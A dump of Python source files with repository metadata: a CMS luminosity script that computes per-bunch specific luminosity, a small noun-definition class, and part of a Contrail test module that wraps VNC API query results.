runtimesInFill[perrundata[0]]=perrundata[7]
return runtimesInFill
def listfilldir(indir):
'''
list all fills contained in the given dir
input: indir
output: [fill]
'''
fillnamepat=r'^[0-9]{4}$'
p=re.compile(fillnamepat)
processedfills=[]
dirList=os.listdir(indir)
for fname in dirList:
if p.match(fname) and os.path.isdir(os.path.join(indir,fname)):#found fill dir
allfs=os.listdir(os.path.join(indir,fname))
for myfile in allfs:
sumfilenamepat=r'^[0-9]{4}_bxsum_CMS.txt$'
s=re.compile(sumfilenamepat)
if s.match(myfile):
#only if fill_summary_CMS.txt file exists
processedfills.append(int(fname))
return processedfills
def lastcompleteFill(infile):
'''
parse infile to find LASTCOMPLETEFILL
input: input file name
output: last completed fill number
'''
lastfill=None
hlinepat=r'(LASTCOMPLETEFILL )([0-9]{4})'
h=re.compile(hlinepat)
dqmfile=open(infile,'r')
for line in dqmfile:
result=h.match(line)
if result:
lastfill=result.group(2)
break
return int(lastfill)
def calculateSpecificLumi(lumi,lumierr,beam1intensity,beam1intensityerr,beam2intensity,beam2intensityerr):
'''
calculate specific lumi
input: instlumi, instlumierror,beam1intensity,beam1intensityerror,beam2intensity,beam2intensityerror
output (specific lumi value,specific lumi error)
'''
specificlumi=0.0
specificlumierr=0.0
if beam1intensity<0: beam1intensity=0
if beam2intensity<0: beam2intensity=0
if beam1intensity>0.0 and beam2intensity>0.0:
specificlumi=float(lumi)/(float(beam1intensity)*float(beam2intensity))
specificlumierr=specificlumi*math.sqrt(lumierr**2/lumi**2+beam1intensityerr**2/beam1intensity**2+beam2intensityerr**2/beam2intensity**2)
return (specificlumi,specificlumierr)
def getFillFromFile(fillnum,inputdir):
'''
parse fill_xxx.txt files in the input directory for runs, starttime in the fill
input: fillnumber, input dir
output: {run:tarttime}
'''
runtimesInFill={}
#look for files 'fill_num.txt' in inputdir
for filename in os.listdir(inputdir):
mpat=r'^fill_[0-9]{4}.txt$'
m=re.compile(mpat)
if m.match(filename) is None:
continue
filename=filename.strip()
if filename.find('.')==-1: continue
basename,extension=filename.split('.')
if not extension or extension!='txt':
continue
if basename.find('_')==-1: continue
prefix,number=basename.split('_')
if not number : continue
if fillnum!=int(number):continue
f=open(os.path.join(inputdir,'fill_'+number+'.txt'),'r')
for line in f:
l=line.strip()
fields=l.split(',')
if len(fields)<2 : continue
runtimesInFill[int(fields[0])]=fields[1]
f.close()
return runtimesInFill
#####output methods####
def filltofiles(allfills,runsperfill,runtimes,dirname):
'''
write runnumber:starttime map per fill to files
'''
f=open(os.path.join(dirname,allfillname),'w')
for fill in allfills:
print >>f,'%d'%(fill)
f.close()
for fill,runs in runsperfill.items():
filename='fill_'+str(fill)+'.txt'
if len(runs)!=0:
f=open(os.path.join(dirname,filename),'w')
for run in runs:
print >>f,'%d,%s'%(run,runtimes[run])
f.close()
def specificlumiTofile(fillnum,filldata,outdir):
#
#input : fillnum
# filldata: {bxidx:[[lstime,beamstatusfrac,lumivalue,lumierror,speclumi,speclumierr]],[]}
#sorted by bxidx, sorted by lstime inside list
#check outdir/fillnum subdir exists; if not, create it; else outdir=outdir/fillnum
#
if not filldata:
print 'empty input data, do nothing for fill ',fillnum
return
timedict={}#{lstime:[[stablebeamfrac,lumi,lumierr,speclumi,speclumierr]]}
filloutdir=os.path.join(outdir,str(fillnum))
if not os.path.exists(filloutdir):
os.mkdir(filloutdir)
for cmsbxidx,perbxdata in filldata.items():
lhcbucket=0
if cmsbxidx!=0:
lhcbucket=(cmsbxidx-1)*10+1
a=sorted(perbxdata,key=lambda x:x[0])
filename=str(fillnum)+'_lumi_'+str(lhcbucket)+'_CMS.txt'
linedata=[]
for perlsdata in a:
ts=int(perlsdata[0])
beamstatusfrac=perlsdata[1]
lumi=perlsdata[2]
lumierror=perlsdata[3]
#beam1intensity=perlsdata[4]
#beam2intensity=perlsdata[5]
speclumi=perlsdata[4]
speclumierror= perlsdata[5]
if lumi>0:
linedata.append([ts,beamstatusfrac,lumi,lumierror,speclumi,speclumierror])
if not timedict.has_key(ts):
timedict[ts]=[]
timedict[ts].append([beamstatusfrac,lumi,lumierror,speclumi,speclumierror])
if len(linedata)>10:#at least 10 good ls
f=open(os.path.join(filloutdir,filename),'w')
for line in linedata:
print >>f, '%d\t%e\t%e\t%e\t%e\t%e'%(line[0],line[1],line[2],line[3],line[4],line[5])
f.close()
#print 'writing avg file'
summaryfilename=str(fillnum)+'_lumi_CMS.txt'
f=None
lstimes=timedict.keys()
lstimes.sort()
fillseg=[]
lscounter=0
for lstime in lstimes:
allvalues=timedict[lstime]
transposedvalues=CommonUtil.transposed(allvalues,0.0)
bstatfrac=transposedvalues[0][0]#beamstatus does not change with bx position
lumivals=transposedvalues[1]
lumitot=sum(lumivals)
if bstatfrac==1.0 :
fillseg.append([lstime,lumitot])
lumierrs=transposedvalues[2]
lumierrortot=math.sqrt(sum(map(lambda x:x**2,lumierrs)))
specificvals=transposedvalues[3]
specificavg=sum(specificvals)/float(len(specificvals))#avg spec lumi
specificerrs=transposedvalues[4]
specifictoterr=math.sqrt(sum(map(lambda x:x**2,specificerrs)))
specificerravg=specifictoterr/float(len(specificvals))
if lscounter==0:
f=open(os.path.join(filloutdir,summaryfilename),'w')
lscounter+=1
print >>f,'%d\t%e\t%e\t%e\t%e\t%e'%(lstime,bstatfrac,lumitot,lumierrortot,specificavg,specificerravg)
if f is not None:
f.close()
#print 'writing summary file'
fillsummaryfilename=str(fillnum)+'_bxsum_CMS.txt'
f=open(os.path.join(filloutdir,fillsummaryfilename),'w')
if len(fillseg)==0:
print >>f,'%s'%('#no stable beams')
f.close()
return
previoustime=fillseg[0][0]
boundarytime=fillseg[0][0]
#print 'boundary time ',boundarytime
summaryls={}
summaryls[boundarytime]=[]
for [lstime,lumitot] in fillseg:#fillseg is everything with stable beam flag
if lstime-previoustime>50.0:
boundarytime=lstime
#print 'found new boundary ',boundarytime
summaryls[boundarytime]=[]
# print 'appending ',boundarytime,lstime,lumitot
summaryls[boundarytime].append([lstime,lumitot])
previoustime=lstime
#print summaryls
summarylstimes=summaryls.keys()
summarylstimes.sort()
lumip=lumiParameters.ParametersObject()
for bts in summarylstimes:
startts=bts
tsdatainseg=summaryls[bts]
#print 'tsdatainseg ',tsdatainseg
stopts=tsdatainseg[-1][0]
plu=max(CommonUtil.transposed(tsdatainseg,0.0)[1])
lui=sum(CommonUtil.transposed(tsdatainseg,0.0)[1])*lumip.lslengthsec()
print >>f,'%d\t%d\t%e\t%e'%(startts,stopts,plu,lui)
f.close()
def getSpecificLumi(schema,fillnum,inputdir,dataidmap,normmap,xingMinLum=0.0,amodetag='PROTPHYS',bxAlgo='OCC1'):
'''
specific lumi in 1e-30 (ub-1s-1) unit
lumidetail occlumi in 1e-27
1309_lumi_401_CMS.txt
time(in seconds since January 1,2011,00:00:00 UTC) stab(fraction of time spent in stable beams for this time bin) l(lumi in Hz/ub) dl(point-to-point error on lumi in Hz/ub) sl(specific lumi in Hz/ub) dsl(error on specific lumi)
20800119.0 1 -0.889948 0.00475996848729 0.249009 0.005583287562 -0.68359 6.24140208607 0.0 0.0 0.0 0.0 0.0 0.0 0.0383576 0.00430892097862 0.0479095 0.00430892097862 66.6447 4.41269758764 0.0 0.0 0.0
result [(time,beamstatusfrac,lumi,lumierror,speclumi,speclumierror)]
'''
t=lumiTime.lumiTime()
fillbypos={}#{bxidx:[[ts,beamstatusfrac,lumi,lumierror,spec1,specerror],[]]}
runtimesInFill=getFillFromDB(schema,fillnum)#{runnum:starttimestr}
runlist=runtimesInFill.keys()
if not runlist: return fillbypos
irunlsdict=dict(zip(runlist,[None]*len(runlist)))
#prirunlsdict
GrunsummaryData=lumiCalcAPI.runsummaryMap(session.nominalSchema(),irunlsdict)
lumidetails=lumiCalcAPI.deliveredLumiForIds(schema,irunlsdict,dataidmap,GrunsummaryData,beamstatusfilter=None,normmap=normmap,withBXInfo=True,bxAlgo=bxAlgo,xingMinLum=xingMinLum,withBeamIntensity=True,lumitype='HF')
#
#output: {run:[lumilsnum(0),cmslsnum(1),timestamp(2),beamstatus(3),beamenergy(4),deliveredlumi(5),calibratedlumierr(6),(bxvalues,bxerrs)(7),(bxidx,b1intensities,b2intensities)(8),fillnum(9)]}
#
totalstablebeamls=0
orderedrunlist=sorted(lumidetails)
for run in orderedrunlist:
perrundata=lumidetails[run]
for perlsdata in perrundata:
beamstatus=perlsdata[3]
if beamstatus=='STABLE BEAMS':
totalstablebeamls+=1
#print 'totalstablebeamls in fill ',totalstablebeamls
if totalstablebeamls<10:#less than 10 LS in a fill has 'stable beam', it's no a good fill
print 'fill ',fillnum,' , having less than 10 stable beam lS, is not good, skip'
return fillbypos
lumiparam=lumiParameters.ParametersObject()
for run in orderedrunlist:
perrundata=lumidetails[run]
for perlsdata in perrundata:
beamstatusfrac=0.0
tsdatetime=perlsdata[2]
ts=calendar.timegm(tsdatetime.utctimetuple())
beamstatus=perlsdata[3]
if beamstatus=='STABLE BEAMS':
beamstatusfrac=1.0
(bxidxlist,bxvaluelist,bxerrolist)=perlsdata[7]
#instbxvaluelist=[x/lumiparam.lslengthsec() for x in bxvaluelist if x]
instbxvaluelist=[x for x in bxvaluelist if x]
maxlumi=0.0
if len(instbxvaluelist)!=0:
maxlumi=max(instbxvaluelist)
avginstlumi=0.0
if len(instbxvaluelist)!=0:
avginstlumi=sum(instbxvaluelist)
(intbxidxlist,b1intensities,b2intensities)=perlsdata[8]#contains only non-zero bx
for bxidx in bxidxlist:
idx=bxidxlist.index(bxidx)
instbxvalue=bxvaluelist[idx]
bxerror=bxerrolist[idx]
if instbxvalue<max(xingMinLum,maxlumi*0.2):
continue
bintensityPos=-1
try:
bintensityPos=intbxidxlist.index(bxidx)
except ValueError:
pass
if bintensityPos<=0:
fillbypos.setdefault(bxidx,[]).append([ts,beamstatusfrac,instbxvalue,bxerror,0.0,0.0])
continue
b1intensity=b1intensities[bintensityPos]
b2intensity=b2intensities[bintensityPos]
speclumi=calculateSpecificLumi(instbxvalue,bxerror,b1intensity,0.0,b2intensity,0.0)
fillbypos.setdefault(bxidx,[]).append([ts,beamstatusfrac,instbxvalue,bxerror,speclumi[0],speclumi[1]])
return fillbypos
##############################
## ######################## ##
## ## ################## ## ##
## ## ## Main Program ## ## ##
## ## ################## ## ##
## ######################## ##
##############################
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog=os.path.basename(sys.argv[0]),description = "specific lumi",formatter_class=argparse.ArgumentDefaultsHelpFormatter)
amodetagChoices = [ "PROTPHYS","IONPHYS",'PAPHYS' ]
xingAlgoChoices =[ "OCC1","OCC2","ET"]
# parse arguments
parser.add_argument('-c',dest='connect',
action='store',
required=False,
help='connect string to lumiDB,optional',
default='frontier://LumiCalc/CMS_LUMI_PROD')
parser.add_argument('-P',dest='authpath',
action='store',
help='path to authentication file,optional')
parser.add_argument('-i',dest='inputdir',
action='store',
required=False,
help='output dir',
default='.')
parser.add_argument('-o',dest='outputdir',
action='store',
required=False,
help='output dir',
default='.')
parser.add_argument('-f','--fill',dest='fillnum',
action='store',
required=False,
help='specific fill',
default=None)
parser.add_argument('--minfill',dest='minfill',
type=int,
action='store',
required=False,
default=MINFILL,
help='min fill')
parser.add_argument('--maxfill',dest='maxfill',
type=int,
action='store',
required=False,
default=MAXFILL,
help='maximum fillnumber '
)
parser.add_argument('--amodetag',dest='amodetag',
action='store',
choices=amodetagChoices,
required=False,
help='specific accelerator mode choices [PROTOPHYS,IONPHYS,PAPHYS] (optional)')
parser.add_argument('--xingMinLum', dest = 'xingMinLum',
type=float,
default=1e-03,
required=False,
help='Minimum luminosity considered for lumibylsXing action')
parser.add_argument('--xingAlgo', dest = 'bxAlgo',
default='OCC1',
required=False,
help='algorithm name for per-bunch lumi ')
parser.add_argument('--normtag',dest='normtag',action='store',
required=False,
help='norm tag',
default=None)
parser.add_argument('--datatag',dest='datatag',action='store',
required=False,
help='data tag',
default=None)
#
#command configuration
#
parser.add_argument('--siteconfpath',dest='siteconfpath',action='store',
help='specific path to site-local-config.xml file, optional. If path undefined, fallback to cern proxy&server')
#
#switches
#
parser.add_argument('--without-correction',dest='withoutNorm',action='store_true',
help='without any correction/calibration' )
parser.add_argument('--debug',dest='debug',action='store_true',
help='debug')
options=parser.parse_args()
if options.authpath:
os.environ['CORAL_AUTH_PATH'] = options.authpath
##
#query DB for all fills and compare with allfills.txt
#if found newer fills, store in mem fill number
#reprocess anyway the last 1 fill in the dir
#redo specific lumi for all marked fills
##
svc=sessionManager.sessionManager(options.connect,authpath=options.authpath,debugON=options.debug)
session=svc.openSession(isReadOnly=True,cpp2sqltype=[('unsigned int','NUMBER(10)'),('unsigned long long','NUMBER(20)')])
fillstoprocess=[]
maxfillnum=options.maxfill
minfillnum=options.minfill
if options.fillnum is not None: #if process a specific single fill
fillstoprocess.append(int(options.fillnum))
else:
session.transaction().start(True)
schema=session.nominalSchema()
allfillsFromDB=lumiCalcAPI.fillInRange(schema,fillmin=minfillnum,fillmax=maxfillnum,amodetag=options.amodetag)
processedfills=listfilldir(options.outputdir)
lastcompletedFill=lastcompleteFill(os.path.join(options.inputdir,'runtofill_dqm.txt'))
for pf in processedfills:
if pf>lastcompletedFill:
print '\tremove unfinished fill from processed list ',pf
processedfills.remove(pf)
for fill in allfillsFromDB:
if fill not in processedfills :
if int(fill)<=lastcompletedFill:
if int(fill)>minfillnum and int(fill)<maxfillnum:
fillstoprocess.append(fill)
else:
print 'ongoing fill...',fill
session.transaction().commit()
print 'fills to process : ',fillstoprocess
if len(fillstoprocess)==0:
print 'no fill to process, exit '
exit(0)
print '===== Start Processing Fills',fillstoprocess
print '====='
filldata={}
#
# check datatag
#
reqfillmin=min(fillstoprocess)
reqfillmax=max(fillstoprocess)
session.transaction().start(True)
runlist=lumiCalcAPI.runList(session.nominalSchema(),options.fillnum,runmin=None,runmax=None,fillmin=reqfillmin,fillmax=reqfillmax,startT=None,stopT=None,l1keyPattern=None,hltkeyPattern=None,amodetag=options.amodetag,nominalEnergy=None,energyFlut=None,requiretrg=False,requirehlt=False)
datatagname=options.datatag
if not datatagname:
(datatagid,datatagname)=revisionDML.currentDataTag(session.nominalSchema())
dataidmap=revisionDML.dataIdsByTagId(session.nominalSchema(),datatagid,runlist=runlist,withcomment=False)
#{run:(lumidataid,trgdataid,hltdataid,())}
else:
dataidmap=revisionDML.dataIdsByTagName(session.nominalSchema(),datatagname,runlist=runlist,withcomment=False)
#
# check normtag and get norm values if required
#
normname='NONE'
normid=0
normvalueDict={}
if not options.withoutNorm:
normname=options.normtag
if not normname:
normmap=normDML.normIdByType(session.nominalSchema(),lumitype='HF',defaultonly=True)
if len(normmap):
normname=normmap.keys()[0]
normid=normmap[normname]
else:
normid=normDML.normIdByName(session.nominalSchema(),normname)
if not normid:
raise RuntimeError('[ERROR] cannot resolve norm/correction')
sys.exit(-1)
normvalueDict=normDML.normValueById(session.nominalSchema(),normid) #{since:[corrector(0),{paramname:paramvalue}(1),amodetag(2),egev(3),comment(4)]}
session.transaction().commit()
for fillnum in fillstoprocess:# process per fill
session.transaction().start(True)
filldata=getSpecificLumi(session.nominalSchema(),fillnum,options.inputdir,dataidmap,normvalueDict,xingMinLum=options.xingMinLum,amodetag=options.amodetag,bxAlgo=options.bxAlgo)
specificlumiTofile(fillnum,filldata,options.outputdir)
session.transaction().commit()
| [
"[email protected]"
]
| |
d5848a9e5ad00752733438c6be9f15f855ff05c2 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_pointer.py | 5ac88a0ce708e9c89cc7b196e8ef77770aec8498 | [
"MIT"
]
| permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 691 | py |
#calss header
class _POINTER():
def __init__(self,):
self.name = "POINTER"
self.definitions = [u'something that is used for pointing at things, such as a long, thin stick that you hold to direct attention to a place on a map or words on a board, or a cursor', u'a helpful piece of advice or information: ', u'something that shows you an existing or developing situation: ', u'a hunting dog that has been trained to stand very still with its nose pointing towards the animals and birds that are being hunted']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"[email protected]"
]
| |
07d74c965ad48428b3acade5da4a6aa190bffc77 | 4a307849ed4dded5ce84b0ceb6d2cf56c2e64b89 | /tcutils/config/vnc_api_results.py | 093f370d0de9d0734a131a098e8f33e0287fb00e | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
]
| permissive | lmadhusudhanan/contrail-test | a6316b41dcb836315d25503f1dee511943d7f976 | bd39ff19da06a20bd79af8c25e3cde07375577cf | refs/heads/master | 2022-05-04T20:01:58.960911 | 2018-06-27T17:56:47 | 2018-06-27T17:56:47 | 138,913,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37,667 | py | import re
from tcutils.verification_util import *
class CsDomainResult (Result):
'''
CsDomainResult to provide access to vnc_introspect_utils.get_cs_domain
dict contrains:
{u'domain': {
u'fq_name': [u'ted-domain'],
u'id_perms': {u'created': None,
u'enable': True,
u'last_modified': None,
u'permissions': {u'group': u'cloud-admin-group',
u'group_access': 7,
u'other_access': 7,
u'owner': u'cloud-admin',
u'owner_access': 7},
u'uuid': {u'uuid_lslong': 13068984139654137108L,
u'uuid_mslong': 9504116366942620127L}},
u'namespaces': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/namespace/c0552b1f-588e-4507-8962-b1837c8f883a',
u'to': [u'ted-domain', u'default-namespace'],
u'uuid': u'c0552b1f-588e-4507-8962-b1837c8f883a'}],
u'projects': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/project/0d779509-7d54-4842-9b34-f85557898b67',
u'to': [u'ted-domain', u'ted-eng'],
u'uuid': u'0d779509-7d54-4842-9b34-f85557898b67'},
{u'attr': {},
u'href': u'http://10.84.7.4:8082/project/1fcf3244-d4d9-407d-8637-54bb2522020e',
u'to': [u'ted-domain', u'default-project'],
u'uuid': u'1fcf3244-d4d9-407d-8637-54bb2522020e'}],
u'_type': u'domain',
u'href': u'http://10.84.7.4:8082/domain/83e5677b-1397-49df-b55e-5bd5234c8514',
u'name': u'ted-domain',
u'uuid': u'83e5677b-1397-49df-b55e-5bd5234c8514'}}
'''
def fq_name(self):
return ':'.join(self.xpath('domain', 'fq_name'))
def name(self):
return self.xpath('domain', 'name')
def uuid(self):
return self.xpath('domain', 'uuid')
def project_list(self):
return map(lambda x: ':'.join(x['to']),
self.xpath('domain', 'projects'))
def project(self, name):
if not self.xpath('domain', 'projects'):
return list()
return filter(lambda x: x['to'] == [self.name(), name],
self.xpath('domain', 'projects'))
def st_list(self):
return self.xpath('domain', 'service_templates')
def st(self, st):
return filter(lambda x: x['to'][-1] == st, self.st_list())
def vdns_list(self):
return self.xpath('domain', 'virtual_DNSs')
def vdns(self, vdns_name):
vdns_li = self.vdns_list()
if vdns_li:
return filter(lambda x: x['to'][-1] == vdns_name, vdns_li)
class CsProjectResult (Result):
'''
CsDomainResult to provide access to vnc_introspect_utils.get_cs_project
dict contrains:
{u'project': {u'fq_name': [u'ted-domain', u'ted-eng'],
u'id_perms': {u'created': None,
u'enable': True,
u'last_modified': None,
u'permissions': {u'group': u'cloud-admin-group',
u'group_access': 7,
u'other_access': 7,
u'owner': u'cloud-admin',
u'owner_access': 7},
u'uuid': {u'uuid_lslong': 11183836820092324711L,
u'uuid_mslong': 970408112711551042}},
u'network_ipams': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/network-ipam/52310151-ec68-4052-9114-14ae1a47f2fb',
u'to': [u'ted-domain',
u'ted-eng',
u'default-network-ipam'],
u'uuid': u'52310151-ec68-4052-9114-14ae1a47f2fb'}],
u'network_policys': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/network-policy/c30461ae-e72a-44a6-845b-7510c7ae3897',
u'to': [u'ted-domain',
u'ted-eng',
u'default-network-policy'],
u'uuid': u'c30461ae-e72a-44a6-845b-7510c7ae3897'}],
u'security_groups': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/security-group/32dc02af-1b3c-4baa-a6eb-3c97cbdd2941',
u'to': [u'ted-domain',
u'ted-eng',
u'default-security-group'],
u'uuid': u'32dc02af-1b3c-4baa-a6eb-3c97cbdd2941'}],
u'service_templates': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/service-template/4264dd1e-d312-4e03-a60e-35b40da39e95',
u'to': [u'ted-domain',
u'ted-eng',
u'default-service-template'],
u'uuid': u'4264dd1e-d312-4e03-a60e-35b40da39e95'}],
u'_type': u'project',
u'virtual_networks': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/virtual-network/6a5c5c29-cfe6-4fea-9768-b0dea3b217bc',
u'to': [u'ted-domain',
u'ted-eng',
u'ted-back'],
u'uuid': u'6a5c5c29-cfe6-4fea-9768-b0dea3b217bc'},
{u'attr': {},
u'href': u'http://10.84.7.4:8082/virtual-network/926c8dcc-0b8b-444f-9f59-9ab67a8f9f48',
u'to': [u'ted-domain',
u'ted-eng',
u'ted-front'],
u'uuid': u'926c8dcc-0b8b-444f-9f59-9ab67a8f9f48'},
{u'attr': {},
u'href': u'http://10.84.7.4:8082/virtual-network/b312647f-0921-4ddf-9d59-0667a887989f',
u'to': [u'ted-domain',
u'ted-eng',
u'default-virtual-network'],
u'uuid': u'b312647f-0921-4ddf-9d59-0667a887989f'}],
u'href': u'http://10.84.7.4:8082/project/0d779509-7d54-4842-9b34-f85557898b67',
u'name': u'ted-eng',
u'parent_name': u'ted-domain',
u'uuid': u'0d779509-7d54-4842-9b34-f85557898b67'}}
'''
def fq_name(self):
return ':'.join(self.xpath('project', 'fq_name'))
def policy_list(self):
return self.xpath('project', 'network_policys')
def policy(self, policy):
return filter(lambda x: x['to'][-1] == policy, self.policy_list())
def vn_list(self):
return self.xpath('project', 'virtual_networks')
def vn(self, vn):
if self.vn_list():
return filter(lambda x: x['to'][-1] == vn, self.vn_list())
return []
def fip_list(self):
if self.has_key('floating_ip_pool_refs'):
p = self.xpath('project', 'floating_ip_pool_refs')
else:
p = []
return p
def fip(self, fip_fq_name=[]):
return filter(lambda x: x['to'] == fip_fq_name, self.fip_list())
def secgrp_list(self):
return self.xpath('project', 'security_groups')
def secgrp(self, secgrp):
secgrp_list = self.secgrp_list()
if secgrp_list:
return filter(lambda x: x['to'][-1] == secgrp, secgrp_list)
def si_list(self):
return self.xpath('project', 'service_instances')
def si(self, si):
si_list = self.si_list()
if si_list:
return filter(lambda x: x['to'][-1] == si, si_list)
def alarm_list(self):
result = self.xpath('project', 'alarms')
if not result:
return []
return result
def alarm(self,alarm):
return filter(lambda x: x['to'][-1] == alarm, self.alarm_list())
class CsAlarmResult(Result):
def fq_name(self):
return ':'.join(self.xpath('alarm','fq_name'))
class CsVdnsResult(Result):
def fq_name(self):
return ':'.join(self.xpath('virtual-DNS', 'fq_name'))
def vdns_data(self):
return ':'.join(self.xpath('virtual-DNS', 'virtual_DNS_data'))
def vdns_records(self):
return ':'.join(self.xpath('virtual-DNS', 'virtual_DNS_records'))
# end of CsVdnsResult
class CsUseFipResult (Result):
'''
CsUseFipResult to provide access to vnc_introspect_utils.get_cs_use_fip_pool
dict contrains:
{u'floating-ip-pool': {u'fq_name': [u'ted-domain',
u'ted-eng',
u'ted-front',
u'ted_fip_pool'],
u'id_perms': {u'created': None,
u'enable': True,
u'last_modified': None,
u'permissions': {u'group': u'cloud-admin-group',
u'group_access': 7,
u'other_access': 7,
u'owner': u'cloud-admin',
u'owner_access': 7},
u'uuid': {u'uuid_lslong': 13214437371555268939L,
u'uuid_mslong': 18023639221065174839L}},
u'project_back_refs': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/project/1fcf3244-d4d9-407d-8637-54bb2522020e',
u'to': [u'ted-domain',
u'default-project'],
u'uuid': u'1fcf3244-d4d9-407d-8637-54bb2522020e'}],
u'_type': u'floating-ip-pool',
u'href': u'http://10.84.7.4:8082/floating-ip-pool/fa20d460-d363-4f37-b763-1cc6be32c94b',
u'name': u'ted_fip_pool',
u'parent_name': u'ted-front',
u'uuid': u'fa20d460-d363-4f37-b763-1cc6be32c94b'}}
'''
class CsAllocFipResult (Result):
'''
CsAllocFipResult to provide access to vnc_introspect_utils.get_cs_alloc_fip_pool
dict contrains:
{u'floating-ip-pool': {u'fq_name': [u'ted-domain',
u'ted-eng',
u'ted-front',
u'ted_fip_pool'],
u'id_perms': {u'created': None,
u'enable': True,
u'last_modified': None,
u'permissions': {u'group': u'cloud-admin-group',
u'group_access': 7,
u'other_access': 7,
u'owner': u'cloud-admin',
u'owner_access': 7},
u'uuid': {u'uuid_lslong': 13214437371555268939L,
u'uuid_mslong': 18023639221065174839L}},
u'project_back_refs': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/project/1fcf3244-d4d9-407d-8637-54bb2522020e',
u'to': [u'ted-domain',
u'default-project'],
u'uuid': u'1fcf3244-d4d9-407d-8637-54bb2522020e'}],
u'_type': u'floating-ip-pool',
u'href': u'http://10.84.7.4:8082/floating-ip-pool/fa20d460-d363-4f37-b763-1cc6be32c94b',
u'name': u'ted_fip_pool',
u'parent_name': u'ted-front',
u'uuid': u'fa20d460-d363-4f37-b763-1cc6be32c94b'}}
'''
pass
class CsIPAMResult (Result):
'''
CsIPAMResult to provide access to vnc_introspect_utils.get_cs_ipam
dict contrains:
{u'network-ipam': {u'fq_name': [u'ted-domain',
u'ted-eng',
u'default-network-ipam'],
u'id_perms': {u'created': None,
u'enable': True,
u'last_modified': None,
u'permissions': {u'group': u'cloud-admin-group',
u'group_access': 7,
u'other_access': 7,
u'owner': u'cloud-admin',
u'owner_access': 7},
u'uuid': {u'uuid_lslong': 10454003373031551739L,
u'uuid_mslong': 5922516436339146834}},
u'network_ipam_mgmt': {u'dhcp_option_list': None,
u'ipam_method': u'dhcp'},
u'_type': u'network-ipam',
u'virtual_network_back_refs': [{u'attr': {u'ipam_subnets': [{u'default_gateway': None,
u'subnet': {u'ip_prefix': u'192.168.1.0',
u'ip_prefix_len': 24}}]},
u'href': u'http://10.84.7.4:8082/virtual-network/6a5c5c29-cfe6-4fea-9768-b0dea3b217bc',
u'to': [u'ted-domain',
u'ted-eng',
u'ted-back'],
u'uuid': u'6a5c5c29-cfe6-4fea-9768-b0dea3b217bc'}],
u'href': u'http://10.84.7.4:8082/network-ipam/52310151-ec68-4052-9114-14ae1a47f2fb',
u'name': u'default-network-ipam',
u'parent_name': u'ted-eng',
u'uuid': u'52310151-ec68-4052-9114-14ae1a47f2fb'}}
'''
def fq_name(self):
return ':'.join(self.xpath('network-ipam', 'fq_name'))
class CsPolicyResult (Result):
'''
CsPolicyResult to provide access to vnc_introspect_utils.get_cs_policy
dict contrains:
{u'network-policy': {u'fq_name': [u'ted-domain',
u'ted-eng',
u'default-network-policy'],
u'id_perms': {u'created': None,
u'enable': True,
u'last_modified': None,
u'permissions': {u'group': u'cloud-admin-group',
u'group_access': 7,
u'other_access': 7,
u'owner': u'cloud-admin',
u'owner_access': 7},
u'uuid': {u'uuid_lslong': 9537345350817167511L,
u'uuid_mslong': 14052464141133300902L}},
u'_type': u'network-policy',
u'href': u'http://10.84.7.4:8082/network-policy/c30461ae-e72a-44a6-845b-7510c7ae3897',
u'name': u'default-network-policy',
u'parent_name': u'ted-eng',
u'uuid': u'c30461ae-e72a-44a6-845b-7510c7ae3897'}}
'''
def fq_name(self):
return ':'.join(self.xpath('network-policy', 'fq_name'))
class CsVNResult (Result):
'''
CsVNResult to provide access to vnc_introspect_utils.get_cs_vn
dict contrains:
{u'virtual-network': {u'fq_name': [u'ted-domain', u'ted-eng', u'ted-back'],
u'id_perms': {u'created': None,
u'enable': True,
u'last_modified': None,
u'permissions': {u'group': u'cloud-admin-group',
u'group_access': 7,
u'other_access': 7,
u'owner': u'cloud-admin',
u'owner_access': 7},
u'uuid': {u'uuid_lslong': 10910164567580612540L,
u'uuid_mslong': 7664102000529133546}},
u'instance_ip_back_refs': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/instance-ip/9d4cbfbc-da80-4732-a98e-77607bd78704',
u'to': [u'9d4cbfbc-da80-4732-a98e-77607bd78704'],
u'uuid': u'9d4cbfbc-da80-4732-a98e-77607bd78704'}],
u'network_ipam_refs': [{u'attr': {u'ipam_subnets': [{u'default_gateway': None,
u'subnet': {u'ip_prefix': u'192.168.1.0',
u'ip_prefix_len': 24}}]},
u'href': u'http://10.84.7.4:8082/network-ipam/52310151-ec68-4052-9114-14ae1a47f2fb',
u'to': [u'ted-domain',
u'ted-eng',
u'default-network-ipam'],
u'uuid': u'52310151-ec68-4052-9114-14ae1a47f2fb'}],
u'routing_instances': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/routing-instance/a68948af-46be-4f26-b73e-9ec725f57437',
u'to': [u'ted-domain',
u'ted-eng',
u'ted-back',
u'ted-back'],
u'uuid': u'a68948af-46be-4f26-b73e-9ec725f57437'}],
u'_type': u'virtual-network',
u'virtual_machine_interface_back_refs': [{u'attr': {},
u'href': u'http://10.84.7.4:8082/virtual-machine-interface/864ecd37-cf1f-43d5-9f63-4f24831859eb',
u'to': [u'c707f91f-68e9-427a-a0ba-92563c0d067f',
u'864ecd37-cf1f-43d5-9f63-4f24831859eb'],
u'uuid': u'864ecd37-cf1f-43d5-9f63-4f24831859eb'}],
u'href': u'http://10.84.7.4:8082/virtual-network/6a5c5c29-cfe6-4fea-9768-b0dea3b217bc',
u'name': u'ted-back',
u'parent_name': u'ted-eng',
